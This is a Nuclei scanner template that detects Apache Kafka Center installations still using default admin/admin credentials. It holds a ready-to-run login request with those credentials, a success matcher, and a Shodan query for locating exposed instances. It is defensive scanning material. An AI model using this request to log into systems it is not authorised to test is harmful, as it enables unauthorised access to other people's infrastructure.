id: kafka-center-default-login
info:
  name: Apache Kafka Center Default Login
  author: dhiyaneshDK
  severity: high
  description: Apache Kafka Center default admin credentials were discovered.
  reference:
    - https://developer.ibm.com/tutorials/kafka-authn-authz/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    shodan-query: http.title:"Kafka Center"
  tags: kafka,default-login
requests:
  - raw:
      - |
        POST /login/system HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name":"{{username}}","password":"{{password}}","checkbox":false}
    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":200'
          - '"name":"admin"'
        condition: and
      - type: status
        status:
          - 200

# Enhanced by mp on 2022/03/10
